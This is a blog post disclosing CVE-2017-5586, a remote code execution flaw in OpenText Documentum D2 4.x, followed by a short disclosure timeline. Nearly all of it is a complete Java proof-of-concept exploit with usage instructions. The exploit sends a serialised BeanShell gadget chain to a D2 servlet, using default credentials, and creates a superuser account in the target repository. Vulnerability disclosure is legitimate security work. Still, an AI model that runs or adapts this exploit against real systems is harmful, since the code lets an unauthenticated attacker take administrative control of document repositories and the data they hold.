2017 m. vasario 15 d., trečiadienis

CVE-2017-5586: Remote code execution in OpenText Documentum D2

CVE Identifier: CVE-2017-5586
Vendor: OpenText
Affected products: Documentum D2 version 4.x
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution

Proof of concept:

==============================
=====8<===========================================


import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.PriorityQueue;


import bsh.Interpreter;
import bsh.XThis;


import com.documentum.fc.client.content.impl.ContentStoreResult;
import com.documentum.fc.client.impl.typeddata.TypedData;


/**
 * @author Andrey B. Panfilov <andrey@panfilov.tel>
 *
 * Code below creates superuser account in underlying Documentum repository
 * usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create>
 *
 */
@SuppressWarnings("unchecked")
public class DocumentumD2BeanShellPoc {


        public static void main(String[] args) throws Exception {
                String url = args[0];
                String docbase = args[1];
                String userName = args[2];
                String payload = "compare(Object foo, Object bar) {new Interpreter()"
                                + ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()"
                                + ".getSessionRegistry().getAllSessions().iterator().next();"
                                + "session=com.emc.d2.api.D2Session.getAdminSession(session, false);"
                                + "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery("
                                + "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', "
                                + "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} "
                                + "catch (Exception e) {}; return 0;\");}";
                Interpreter interpreter = new Interpreter();
                interpreter.eval(String.format(payload, userName, userName, userName));
                XThis x = new XThis(interpreter.getNameSpace(), interpreter);
                Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, });
                PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
                Object[] queue = new Object[] { 1, 1 };
                setFieldValue(priorityQueue, "queue", queue);
                setFieldValue(priorityQueue, "size", 2);


                // actually we may send priorityQueue directly, but I want to hide
                // deserialization stuff from stacktrace :)
                Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder");
                Constructor ctor = cls.getConstructor();
                ctor.setAccessible(true);


                Object valueHolder = ctor.newInstance();
                setFieldValue(valueHolder, "m_value", priorityQueue);
                List valueHolders = new ArrayList();
                valueHolders.add(valueHolder);


                TypedData data = new TypedData();
                setFieldValue(data, "m_valueHolders", valueHolders);


                ContentStoreResult result = new ContentStoreResult();
                setFieldValue(result, "m_attrs", data);


                ByteArrayOutputStream baos = new ByteArrayOutputStream();
                DataOutputStream dos = new DataOutputStream(baos);
                for (Character c : "SAVED".toCharArray()) {
                        dos.write(c);
                }
                dos.write((byte) 124);
                dos.flush();
                ObjectOutputStream oos = new ObjectOutputStream(baos);
                oos.writeObject(result);
                oos.flush();
                byte[] bytes = baos.toByteArray();
                baos = new ByteArrayOutputStream();
                dos = new DataOutputStream(baos);
                dos.writeInt(bytes.length);
                dos.write(bytes);
                dos.flush();
                HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
                conn.setRequestProperty("Content-Type", "application/octet-stream");
                conn.setRequestMethod("POST");
                conn.setUseCaches(false);
                conn.setDoOutput(true);
                conn.getOutputStream().write(baos.toByteArray());
                conn.connect();
                System.out.println("Response code: " + conn.getResponseCode());
                InputStream stream = conn.getInputStream();
                byte[] buff = new byte[1024];
                int count = 0;
                while ((count = stream.read(buff)) != -1) {
                        System.out.write(buff, 0, count);
                }
        }


        public static String makeUrl(String url) {
                if (!url.endsWith("/")) {
                        url += "/";
                }
                return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd&file_length=1000"
                                + "&_username=dmc_wdk_preferences_owner&_password=webtop";
        }


        public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
                Field field = clazz.getDeclaredField(fieldName);
                if (field == null && clazz.getSuperclass() != null) {
                        field = getField(clazz.getSuperclass(), fieldName);
                }
                field.setAccessible(true);
                return field;
        }


        public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
                final Field field = getField(obj.getClass(), fieldName);
                field.set(obj, value);
        }


}


===================================>8===========================================



Disclosure timeline:

2016.02.28: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure


__
Regards,
Andrey B. Panfilov
Pranešimą parašė ties

Komentarų nėra:

Rašyti komentarą

Užsisakykite: Rašyti komentarus (Atom)